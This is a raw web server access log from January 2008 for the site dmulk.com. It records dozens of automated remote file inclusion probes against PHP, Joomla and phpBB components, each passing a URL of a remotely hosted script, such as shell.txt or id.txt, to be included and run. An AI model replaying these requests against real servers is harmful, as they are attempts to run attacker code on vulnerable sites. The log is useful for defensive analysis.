216.246.41.127 - - [18/Jan/2008:10:18:19 -0800] "GET /logs/access_071229.log/start.php?basepath=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [18/Jan/2008:10:18:19 -0800] "GET /start.php?basepath=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [18/Jan/2008:10:18:19 -0800] "GET /logs/start.php?basepath=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:10:18:31 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:10:20:54 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:10:20:54 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:10:20:54 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [18/Jan/2008:10:21:48 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:10:22:24 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:22:27 -0800] "GET //components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:22:27 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
216.246.41.127 - - [18/Jan/2008:10:22:30 -0800] "GET /logs/access_071224.log/start.php?basepath=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:10:22:42 -0800] "GET /logs/access_080101.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:10:22:43 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:10:22:43 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.249.135.2 - - [18/Jan/2008:10:23:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://clat.org/modules/tinycontent/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.249.135.2 - - [18/Jan/2008:10:23:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://clat.org/modules/tinycontent/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:23:56 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:23:56 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:23:56 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:10:24:28 -0800] "GET /logs/access_071228.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:10:24:28 -0800] "GET //zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:10:24:29 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:10:24:42 -0800] "GET /logs/access_071228.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:10:24:42 -0800] "GET //zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:10:24:42 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:10:24:44 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.188.66 - - [18/Jan/2008:10:25:28 -0800] "GET /logs/access.log/Calendar/tools/send_reminders.php?noSet=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.188.66 - - [18/Jan/2008:10:25:28 -0800] "GET /logs/Calendar/tools/send_reminders.php?noSet=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:10:25:42 -0800] "GET //zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:10:25:46 -0800] "GET //zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:10:27:39 -0800] "GET /logs/access.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:10:27:42 -0800] "GET /logs/access.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.192.194 - - [18/Jan/2008:10:28:23 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.85.192.194 - - [18/Jan/2008:10:28:26 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.72.125.165 - - [18/Jan/2008:10:28:54 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.72.125.165 - - [18/Jan/2008:10:28:54 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.15.175.50 - - [18/Jan/2008:10:29:16 -0800] "GET /logs/content/modify_go.php?pwfile=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.15.175.50 - - [18/Jan/2008:10:29:16 -0800] "GET /content/modify_go.php?pwfile=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:10:30:38 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:10:30:38 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:10:30:42 -0800] "GET /index.php?option=com_ajaxfloats&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:10:30:42 -0800] "GET /logs/index.php?option=com_ajaxfloats&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.225.230.234 - - [18/Jan/2008:10:33:03 -0800] "GET /logs/access_071229.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.234 - - [18/Jan/2008:10:33:03 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.234 - - [18/Jan/2008:10:33:04 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 30688 "-" "libwww-perl/5.808" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:33:08 -0800] "GET //components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:33:08 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:10:33:24 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:10:36:29 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:10:36:29 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:37:59 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:37:59 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:38:00 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 30687 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:38:01 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:38:01 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:38:02 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 30687 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:39:24 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:10:39:25 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:41:24 -0800] "GET /logs//path/admin/admin.php?vwar_root=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.62.160.32 - - [18/Jan/2008:10:41:25 -0800] "GET //path/admin/admin.php?vwar_root=http://moypa.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.249.135.2 - - [18/Jan/2008:10:43:38 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://clat.org/modules/tinycontent/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:10:43:48 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:10:43:55 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:10:43:56 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:10:43:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.31.151.32 - - [18/Jan/2008:10:44:06 -0800] "GET /logs/access_071229.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.151.32 - - [18/Jan/2008:10:44:06 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.151.32 - - [18/Jan/2008:10:44:07 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 31321 "-" "libwww-perl/5.805" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:10:44:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:10:44:09 -0800] "GET /logs/access_071229.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:10:44:19 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:10:44:19 -0800] "GET /?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:10:44:20 -0800] "GET /logs/?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 31315 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:44:23 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:44:23 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:44:23 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:10:45:16 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.250.115 - - [18/Jan/2008:10:47:47 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:47:52 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:47:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:47:53 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:10:47:58 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
75.125.162.74 - - [18/Jan/2008:10:48:07 -0800] "GET / HTTP/1.1" 200 2962 "http://www.stockleaf.com/directory/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:10:48:56 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:10:48:56 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:10:48:57 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [18/Jan/2008:10:49:13 -0800] "GET /logs/access_080101.log///?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [18/Jan/2008:10:49:14 -0800] "GET ///?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [18/Jan/2008:10:49:14 -0800] "GET /logs///?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 200 30688 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.110.136 - - [18/Jan/2008:10:55:40 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:58:44 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:58:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:10:58:45 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:10:59:48 -0800] "GET /logs/access_071216.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:10:59:53 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:11:00:00 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 31321 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:00:08 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:00:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:00:08 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:11:01:23 -0800] "GET /logs/access_071220.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:24 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:24 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:01:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:11:02:08 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:11:02:08 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
